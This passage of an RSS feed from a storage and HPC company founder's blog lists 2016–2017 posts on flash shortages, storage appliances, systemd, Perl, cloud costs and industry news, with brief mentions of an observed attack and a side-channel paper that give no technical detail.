      <title>SSD/flash/memory shortage, day N&#43;1</title>
      <link>https://blog.scalability.org/2017/01/ssdflashmemory-shortage-day-n1/</link>
      <pubDate>Mon, 16 Jan 2017 19:53:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/ssdflashmemory-shortage-day-n1/</guid>
      <description>There has been a huge demand for SSD/Flash/memory components from a number of end users. Sadly, not the day job&amp;rsquo;s customers &amp;hellip; but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Couple that with a (mis)expectation of continuously falling prices across the board, and you get interesting conversations with customers. We&amp;rsquo;ve tried to set expectations appropriately, but we&amp;rsquo;ve been bitten in the past by doing just this.</description>
    </item>
    
    <item>
      <title>A new (old) customer for the day job</title>
      <link>https://blog.scalability.org/2017/01/a-new-old-customer-for-the-day-job/</link>
      <pubDate>Mon, 16 Jan 2017 19:40:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-new-old-customer-for-the-day-job/</guid>
      <description>Our friends at MSU HPCC now are the proud owners of a very fast/high performance Unison Flash storage system, and a ZFS backed high performance Unison storage spinning disk unit. Installed first week of Jan 2017. As MSU is one of my alma mater institutions, I am quite happy about helping them out with this kit. They&amp;rsquo;ve been a customer previously; they had bought some HPC MPI/OpenMP programming training in the dim and distant past.</description>
    </item>
    
    <item>
      <title>Architecture matters, and yes Virginia, there are no silver bullets for performance</title>
      <link>https://blog.scalability.org/2017/01/architecture-matters-and-yes-virginia-there-are-no-silver-bullets-for-performance/</link>
      <pubDate>Mon, 16 Jan 2017 19:31:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/architecture-matters-and-yes-virginia-there-are-no-silver-bullets-for-performance/</guid>
      <description>Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -&amp;gt; 10x better. Yet &amp;hellip; yet &amp;hellip; we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn&amp;rsquo;t it the same as X (insert your favorite volume vendor here)?</description>
    </item>
    
    <item>
      <title>#Perl on the rise for #DevOps</title>
      <link>https://blog.scalability.org/2017/01/perl-on-the-rise-for-devops/</link>
      <pubDate>Sun, 08 Jan 2017 16:15:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/perl-on-the-rise-for-devops/</guid>
      <description>Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is, by and large, my current go-to language. I&amp;rsquo;ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python &amp;hellip; they build (actually very good) tools.</description>
    </item>
    
    <item>
      <title>Another itch scratched</title>
      <link>https://blog.scalability.org/2016/12/another-itch-scratched/</link>
      <pubDate>Mon, 26 Dec 2016 22:58:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/another-itch-scratched/</guid>
      <description>So there you are, with many software RAIDs. You&amp;rsquo;ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn&amp;rsquo;t clean up the last build right, and you thought you had a hot spare &amp;hellip; until you looked at /proc/mdstat &amp;hellip; and said &amp;hellip; Oh &amp;hellip; So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.</description>
    </item>
    
    <item>
      <title>ClusterHQ dies</title>
      <link>https://blog.scalability.org/2016/12/clusterhq-dies/</link>
      <pubDate>Fri, 23 Dec 2016 16:28:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/clusterhq-dies/</guid>
      <description>ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ&amp;rsquo;s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it&amp;rsquo;s very hard to outcompete something like k8s.</description>
    </item>
    
    <item>
      <title>fortran for webapps</title>
      <link>https://blog.scalability.org/2016/12/fortran-for-webapps/</link>
      <pubDate>Wed, 21 Dec 2016 03:21:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/fortran-for-webapps/</guid>
      <description>Use Fortran for your MVC web app. No, really &amp;hellip; Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so &amp;hellip; 80s &amp;hellip; Like in grad school, man &amp;hellip; You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.</description>
    </item>
    
    <item>
      <title>Another fun bit of debugging</title>
      <link>https://blog.scalability.org/2016/12/another-fun-bit-of-debugging/</link>
      <pubDate>Wed, 21 Dec 2016 03:12:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/another-fun-bit-of-debugging/</guid>
      <description>Ok &amp;hellip; so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.</description>
    </item>
    
    <item>
      <title>Violin files for Chapter 11</title>
      <link>https://blog.scalability.org/2016/12/violin-files-for-chapter-11/</link>
      <pubDate>Sat, 17 Dec 2016 17:34:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/violin-files-for-chapter-11/</guid>
      <description>This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash &amp;ldquo;array&amp;rdquo;. The performance is somewhat &amp;ldquo;meh&amp;rdquo;, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable&amp;rsquo;s 4-year-old models, never mind the new stuff. Since the IPO, they&amp;rsquo;ve been on something of a monotonic down-direction in share price.</description>
    </item>
    
    <item>
      <title>So it seems Java is not free</title>
      <link>https://blog.scalability.org/2016/12/so-it-seems-java-is-not-free/</link>
      <pubDate>Sat, 17 Dec 2016 17:26:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/so-it-seems-java-is-not-free/</guid>
      <description>This article on The Register indicates that Oracle is now working actively to monetize Java use. Given the spate of Java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks &amp;hellip; you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) &amp;hellip; and now you need to start paying for the privilege of using the platform.</description>
    </item>
    
    <item>
      <title>She&#39;s dead Jim</title>
      <link>https://blog.scalability.org/2016/12/shes-dead-jim/</link>
      <pubDate>Thu, 01 Dec 2016 18:35:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/shes-dead-jim/</guid>
      <description>It looks like (if the rumor is true) Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS. This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects &amp;hellip; yeah &amp;hellip; it&amp;rsquo;s likely over. FWIW: I like SmartOS. The issue for it is drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox&amp;rsquo;s fault).</description>
    </item>
    
    <item>
      <title>On closure</title>
      <link>https://blog.scalability.org/2016/11/on-closure/</link>
      <pubDate>Wed, 09 Nov 2016 19:44:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/on-closure/</guid>
      <description>I work with many people, have regular email and phone contact with them, as well as occasional face to face meetings. We talk ideas back and forth, develop plans. I work on designs, coordinating everything that goes into those designs (usually built upon our kit). I work hard on my proposals, thinking many things through, developing very detailed plans. I share these with the people &amp;hellip; our customers. And then the pinging begins.</description>
    </item>
    
    <item>
      <title>Inventory reduction event at the day job</title>
      <link>https://blog.scalability.org/2016/11/inventory-reduction-event-at-the-day-job/</link>
      <pubDate>Wed, 02 Nov 2016 20:02:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/inventory-reduction-event-at-the-day-job/</guid>
      <description>We&amp;rsquo;ve got 3x Unison (https://scalableinformatics.com/unison) and 1x Cadence (https://scalableinformatics.com/cadence) systems that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPs (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis, so feel free to reach out if you&amp;rsquo;d like to hear more. Specs:
ucp-01 (Unison1): 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 60x 2TB drives, 4x 800GB SSD
ucp-04 (Unison2): 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 60x 2TB drives, 4x 800GB SSD
usn-03 (Cadence1): 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 48x 400GB SATA SSD
One more unlisted Unison unit with the same specs as the others, though with 3TB drives.</description>
    </item>
    
    <item>
      <title>Its 2016, almost 2017 ... fix your application installer so it doesn&#39;t need to reboot my machine!</title>
      <link>https://blog.scalability.org/2016/11/its-2016-almost-2017-fix-your-application-installer-so-it-doesnt-need-to-reboot-my-machine/</link>
      <pubDate>Tue, 01 Nov 2016 17:10:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/its-2016-almost-2017-fix-your-application-installer-so-it-doesnt-need-to-reboot-my-machine/</guid>
      <description>There I was running my windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries &amp;hellip; because &amp;hellip; hey &amp;hellip; they haven&amp;rsquo;t quite figured out that the word processor should do this for you &amp;hellip; AUTOMATICALLY &amp;hellip; Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company&amp;rsquo;s code pops up and says &amp;ldquo;hey, you wanna update me?</description>
    </item>
    
    <item>
      <title>strace -p is your friend</title>
      <link>https://blog.scalability.org/2016/10/strace-p-is-your-friend/</link>
      <pubDate>Wed, 26 Oct 2016 14:10:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/strace-p-is-your-friend/</guid>
      <description>So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters &amp;hellip; and then garbage. Hmmm. I&amp;rsquo;d like to pause our story for a moment, and say I had the key insight at this moment &amp;hellip; but that would not be true.</description>
    </item>
    
    <item>
      <title>Finding unpatched &#34;features&#34; in distro packages</title>
      <link>https://blog.scalability.org/2016/10/finding-unpatched-features-in-distro-packages/</link>
      <pubDate>Wed, 19 Oct 2016 16:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/finding-unpatched-features-in-distro-packages/</guid>
      <description>I generally expect baseline distro packages to be &amp;ldquo;old&amp;rdquo; by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I&amp;rsquo;ve heard the expression &amp;ldquo;bug for bug compatible&amp;rdquo; when dealing with newer code on older systems. Something about the devil you know vs the devil you don&amp;rsquo;t. Ok. In this case, CMake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.</description>
    </item>
    
    <item>
      <title>Watching a low level attack in process</title>
      <link>https://blog.scalability.org/2016/10/watching-a-low-level-attack-in-process/</link>
      <pubDate>Sat, 15 Oct 2016 21:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/watching-a-low-level-attack-in-process/</guid>
      <description>I won&amp;rsquo;t say where, but it is fascinating watching what is being tried. I won&amp;rsquo;t divulge details of any sort (asymmetric information works to my advantage here).</description>
    </item>
    
    <item>
      <title>On expectations</title>
      <link>https://blog.scalability.org/2016/10/on-expectations/</link>
      <pubDate>Wed, 05 Oct 2016 02:09:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/on-expectations/</guid>
      <description>This has happened multiple times over the last few months. Just variations on the theme as it were, so I&amp;rsquo;ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in the market. We pride ourselves on being able to make things go very &amp;hellip; very fast. If it&amp;rsquo;s slow, IMO, it&amp;rsquo;s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.</description>
    </item>
    
    <item>
      <title>Excellent article on mistakes made for infrastructure ... cloud jail is about right</title>
      <link>https://blog.scalability.org/2016/09/excellent-article-on-mistakes-made-for-infrastructure-cloud-jail-is-about-right/</link>
      <pubDate>Fri, 30 Sep 2016 17:37:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/excellent-article-on-mistakes-made-for-infrastructure-cloud-jail-is-about-right/</guid>
      <description>Article is here at Firstround capital. This goes to a point I&amp;rsquo;ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don&amp;rsquo;t work. We&amp;rsquo;ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really &amp;hellip; really grok what is going on.</description>
    </item>
    
    <item>
      <title>The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some &#34;helpers&#34;</title>
      <link>https://blog.scalability.org/2016/09/the-joy-of-ie-and-urls-or-how-to-fix-ridiculous-parsing-errors-on-the-part-of-some-helpers/</link>
      <pubDate>Thu, 29 Sep 2016 19:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/the-joy-of-ie-and-urls-or-how-to-fix-ridiculous-parsing-errors-on-the-part-of-some-helpers/</guid>
      <description>Short version. Day job sending some marketing out. URLs are pretty clear cut. Tested well. But some clients seem to have mis-parsed the url. Like with a trailing &amp;ldquo;)&amp;rdquo;. For some reason. That I don&amp;rsquo;t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn&amp;rsquo;t quite work the way it was intended, and it killed the requests.</description>
    </item>
    
    <item>
      <title>I don&#39;t agree with everything he wrote about systemd, but he isn&#39;t wrong on a fair amount of it</title>
      <link>https://blog.scalability.org/2016/09/i-dont-agree-with-everything-he-wrote-about-systemd-but-he-isnt-wrong-on-a-fair-amount-of-it/</link>
      <pubDate>Thu, 29 Sep 2016 13:45:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/i-dont-agree-with-everything-he-wrote-about-systemd-but-he-isnt-wrong-on-a-fair-amount-of-it/</guid>
      <description>Systemd has taken the linux world by storm, replacing 20-ish year old init style processing with a more legitimate control plane: a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually, some of these things are specifically geared towards desktop users (which isn&amp;rsquo;t a bad thing if you are a desktop linux user, as I am).</description>
    </item>
    
    <item>
      <title>Hows this for a nice deskside system ... one of our Cadence boxen</title>
      <link>https://blog.scalability.org/2016/09/hows-this-for-a-nice-deskside-system-one-of-our-cadence-boxen/</link>
      <pubDate>Wed, 28 Sep 2016 02:30:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/hows-this-for-a-nice-deskside-system-one-of-our-cadence-boxen/</guid>
      <description>For a partner. They made a request for something we&amp;rsquo;ve not built in a while &amp;hellip; it had been end-of-lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer &amp;hellip; built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.</description>
    </item>
    
    <item>
      <title>Build me a big data analysis room</title>
      <link>https://blog.scalability.org/2016/09/build-me-a-big-data-analysis-room/</link>
      <pubDate>Wed, 28 Sep 2016 02:09:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/build-me-a-big-data-analysis-room/</guid>
      <description>This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall &amp;hellip; 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn&amp;rsquo;t allow any of these, but it was still a cool request.</description>
    </item>
    
    <item>
      <title>A good read on realities behind cloud computing</title>
      <link>https://blog.scalability.org/2016/09/a-good-read-on-realities-behind-cloud-computing/</link>
      <pubDate>Fri, 23 Sep 2016 11:53:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/a-good-read-on-realities-behind-cloud-computing/</guid>
      <description>In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn&amp;rsquo;t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.</description>
    </item>
    
    <item>
      <title>Running conditioning on 4x Forte #HPC #NVMe #storage units</title>
      <link>https://blog.scalability.org/2016/09/running-conditioning-on-4x-forte-hpc-nvme-storage-units/</link>
      <pubDate>Wed, 21 Sep 2016 20:42:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/running-conditioning-on-4x-forte-hpc-nvme-storage-units/</guid>
      <description>This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.</description>
    </item>
    
    <item>
      <title>Amazing statistics</title>
      <link>https://blog.scalability.org/2016/09/amazing-statistics/</link>
      <pubDate>Sun, 18 Sep 2016 16:17:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/amazing-statistics/</guid>
      <description>In the last year, this is what this blog has seen for visitors/viewers and page views:
188,654 (unique) visitors
2,572,665 page views
I am &amp;hellip; humbled &amp;hellip;</description>
    </item>
    
    <item>
      <title>Aquila launches Aquarius</title>
      <link>https://blog.scalability.org/2016/09/aquila-launches-aquarius/</link>
      <pubDate>Thu, 15 Sep 2016 17:11:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/aquila-launches-aquarius/</guid>
      <description>Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners &amp;hellip; Congrats guys! Great job!</description>
    </item>
    
    <item>
      <title>New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s</title>
      <link>https://blog.scalability.org/2016/09/new-hpc-storage-configs-for-bigdata-up-to-16pb-at-160gbs/</link>
      <pubDate>Thu, 15 Sep 2016 15:54:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/new-hpc-storage-configs-for-bigdata-up-to-16pb-at-160gbs/</guid>
      <description>This is an update to Scalable Informatics &amp;ldquo;portable petabyte&amp;rdquo; offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we&amp;rsquo;ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included &amp;hellip; long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we&amp;rsquo;ve built or integrated into the systems.</description>
    </item>
    
    <item>
      <title>Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.</title>
      <link>https://blog.scalability.org/2016/09/fully-ramdisk-booted-centos-7-2-based-sios-image-for-hpc-bigdata-storage-etc/</link>
      <pubDate>Thu, 15 Sep 2016 02:33:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/fully-ramdisk-booted-centos-7-2-based-sios-image-for-hpc-bigdata-storage-etc/</guid>
      <description>This is something we&amp;rsquo;ve been working on for a while &amp;hellip; a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat &amp;hellip; just need to point to those repositories). And it&amp;rsquo;s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.</description>
    </item>
    
    <item>
      <title>An article on Python vs Julia for scripting</title>
      <link>https://blog.scalability.org/2016/08/an-article-on-python-vs-julia-for-scripting/</link>
      <pubDate>Tue, 23 Aug 2016 14:32:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/an-article-on-python-vs-julia-for-scripting/</guid>
      <description>For those who don&amp;rsquo;t know, Julia is a very powerful new language, which aims to leverage a JIT compilation mechanism to generate very fast numerical/computational code from a well thought out language. I&amp;rsquo;ve argued for a while that it feels like a better Python than Python. Python, for those who aren&amp;rsquo;t aware, is a scripting language which has risen in popularity in recent years. It is generally fairly easy to work in, with a few caveats.</description>
    </item>
    
    <item>
      <title>OpenLDAP &#43; sssd ... the simple guide</title>
      <link>https://blog.scalability.org/2016/08/openldap-sssd-the-simple-guide/</link>
      <pubDate>Mon, 22 Aug 2016 19:45:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/openldap-sssd-the-simple-guide/</guid>
      <description>Ok. Here&amp;rsquo;s the problem. Small environment for customers, who are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.</description>
    </item>
    
    <item>
      <title>M&amp;A time:  HPE buys SGI, mostly for the big data analytics appliances</title>
      <link>https://blog.scalability.org/2016/08/ma-time-hpe-buys-sgi-mostly-for-the-big-data-analytics-appliances/</link>
      <pubDate>Fri, 12 Aug 2016 02:30:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/ma-time-hpe-buys-sgi-mostly-for-the-big-data-analytics-appliances/</guid>
      <description>I do expect more consolidation in this space. There aren&amp;rsquo;t many players doing what SGI (and the day job) does. The story is here. The interesting thing about this is, that this is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low &amp;hellip; and the point they make about the data explosion is exactly what we talk about as well.</description>
    </item>
    
    <item>
      <title>@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box</title>
      <link>https://blog.scalability.org/2016/08/scalableinfo-60-bay-unison-with-these-3-6pb-raw-per-4u-box/</link>
      <pubDate>Wed, 10 Aug 2016 02:23:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/scalableinfo-60-bay-unison-with-these-3-6pb-raw-per-4u-box/</guid>
      <description>Color me impressed &amp;hellip; Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -&amp;gt; 6 x 10^4 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.</description>
    </item>
    
    <item>
      <title>Raw Unapologetic Firepower: kdb&#43; from @Kx</title>
      <link>https://blog.scalability.org/2016/08/raw-unapologetic-firepower-kdb-from-kx/</link>
      <pubDate>Fri, 05 Aug 2016 18:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/raw-unapologetic-firepower-kdb-from-kx/</guid>
      <description>While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I&amp;rsquo;ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It&amp;rsquo;s not quite an exact description; have a look at Kx&amp;rsquo;s website for a more accurate one.</description>
    </item>
    
    <item>
      <title>Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said</title>
      <link>https://blog.scalability.org/2016/07/seagate-and-clusterstor-a-lesson-in-not-jumping-to-conclusions-based-on-what-was-not-said/</link>
      <pubDate>Tue, 26 Jul 2016 16:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/seagate-and-clusterstor-a-lesson-in-not-jumping-to-conclusions-based-on-what-was-not-said/</guid>
      <description>I saw this analysis this morning on the Register&amp;rsquo;s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in &amp;ldquo;direct&amp;rdquo; competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.</description>
    </item>
    
    <item>
      <title>Systemd and non-desktop scenarios</title>
      <link>https://blog.scalability.org/2016/07/systemd-and-non-desktop-scenarios/</link>
      <pubDate>Wed, 20 Jul 2016 18:49:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/systemd-and-non-desktop-scenarios/</guid>
      <description>So we&amp;rsquo;ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform &amp;hellip; for one, it doesn&amp;rsquo;t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I&amp;rsquo;ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.</description>
    </item>
    
    <item>
      <title>You can&#39;t win</title>
      <link>https://blog.scalability.org/2016/07/you-cant-win/</link>
      <pubDate>Wed, 20 Jul 2016 12:16:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/you-cant-win/</guid>
      <description>Like that old joke about the patient going to the Doctor for a pain &amp;hellip;
Imagine if you will, a patient who, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And becomes more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.</description>
    </item>
    
    <item>
      <title>That was fun ... no wait ... the other thing ... not fun</title>
      <link>https://blog.scalability.org/2016/06/that-was-fun-no-wait-the-other-thing-not-fun/</link>
      <pubDate>Wed, 22 Jun 2016 21:26:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/that-was-fun-no-wait-the-other-thing-not-fun/</guid>
      <description>Long overdue update of the server this blog runs on. It is no longer running a Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn&amp;rsquo;t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, have a specific sell by date, and it is often very hard to update to the newer revs.</description>
    </item>
    
    <item>
      <title>And this was a good idea ... why ?</title>
      <link>https://blog.scalability.org/2016/06/and-this-was-a-good-idea-why/</link>
      <pubDate>Wed, 22 Jun 2016 13:23:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/and-this-was-a-good-idea-why/</guid>
      <description>The Debian/Ubuntu update tool is named &amp;ldquo;apt&amp;rdquo; with various utilities built around it. For the most part, it works very well, and software upgrades nicely. Sort of like yum and its ilk, but it pre-dates them. This tool is meant for automated (e.g. lights out) updates. No keyboard interaction should be required. Ever. For any reason. However &amp;hellip; a recent update to one particular package, in Debian, and in Ubuntu, has resulted in installation/updates pausing.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Vertical integration plays</title>
      <link>https://blog.scalability.org/2016/06/ma-vertical-integration-plays/</link>
      <pubDate>Thu, 16 Jun 2016 16:01:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/ma-vertical-integration-plays/</guid>
      <description>Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.</description>
    </item>
    
    <item>
      <title>About that cloud &#34;security&#34;</title>
      <link>https://blog.scalability.org/2016/06/about-that-cloud-security/</link>
      <pubDate>Mon, 13 Jun 2016 12:20:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/about-that-cloud-security/</guid>
      <description>Wow &amp;hellip; might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn&amp;rsquo;t just a highly over specialized case, and is actually applicable to real world scenarios, we&amp;rsquo;ll need to make sure we understand methods to mitigate.</description>
    </item>
    
    <item>
      <title>Ah Gmail ... losing more emails</title>
      <link>https://blog.scalability.org/2016/06/ah-gmail-losing-more-emails/</link>
      <pubDate>Fri, 10 Jun 2016 17:36:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/ah-gmail-losing-more-emails/</guid>
      <description>So &amp;hellip; my wife and I have private gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to gmail. Not in the spam folder. But to gmail. So I have her send it to this machine. Gets here right away. We moved the day job&amp;rsquo;s support email address off gmail (it&amp;rsquo;s just a reflector now) into the same tech running inside our FW.</description>
    </item>
    
    <item>
      <title>Real scalability is hard, aka there are no silver bullets</title>
      <link>https://blog.scalability.org/2016/06/real-scalability-is-hard-aka-there-are-no-silver-bullets/</link>
      <pubDate>Tue, 07 Jun 2016 17:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/real-scalability-is-hard-aka-there-are-no-silver-bullets/</guid>
      <description>I talked about hypothetical silver bullets in the recent past at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet &amp;hellip; no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot hope to throw a metric-ton of machines at a problem and hope that scaling is simple and linear.</description>
    </item>
    
    <item>
      <title>Having to do this in a kernel build is simply annoying</title>
      <link>https://blog.scalability.org/2016/06/having-to-do-this-in-a-kernel-build-is-simply-annoying/</link>
      <pubDate>Thu, 02 Jun 2016 18:48:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/having-to-do-this-in-a-kernel-build-is-simply-annoying/</guid>
